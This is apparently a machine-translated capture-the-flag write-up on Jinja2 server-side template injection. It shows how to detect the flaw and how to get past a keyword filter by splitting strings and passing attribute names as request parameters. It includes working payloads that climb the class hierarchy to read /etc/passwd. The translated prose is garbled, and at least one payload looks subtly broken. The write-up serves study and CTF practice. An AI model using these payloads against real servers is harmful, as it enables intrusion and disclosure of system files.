Knowledge point 1： How to determine the existence of SSTI Inject

Knowledge point 2： Some keywords are banned , How to bypass the

One . How to determine the existence of SSTI

  According to the tips of website pictures and topic descriptions , Elephants are php, Python is python, It shows that this website uses python Written

stay python in , The more conventional vulnerability is SSTI Template Injection

Try to verify the vulnerability

Obviously , There are loopholes  

meanwhile , There are also filter key fields  

Two .SSTI Bypass

Reference link ：

SSTI Template injection bypass （ Advanced ）_yu22x The blog of -CSDN Blog _ssti Bypass

SSTI Template injection and bypass posture ( be based on Python-Jinja2)_Y4tacker The blog of -CSDN Blog _ssti Bypass

After submitting a series of parameters , It is found that these fields are filtered

class,mro,subclasses

Method 1

By splicing strings, that is

.__class__ -> ["__c""lass__"]
.->[]     __class__ -> "__c""lass__"

It should be noted that , Representing a function () Need to put in [] outside  

Method 2

Bypass by passing parameters

GET The way

{
   {''.__class__}} => {
   {''[request.args.t1]}}?t1=__class__

POST The way ： It needs to be divided into two steps

{
   { ''[request.value.class][request.value.mro][2][request.value.subclasses]()[40]('/etc/passwd').read() }}

Then send a message to this page post Request package for

class=__class__&mro=__mro__&subclasses=__subclasses__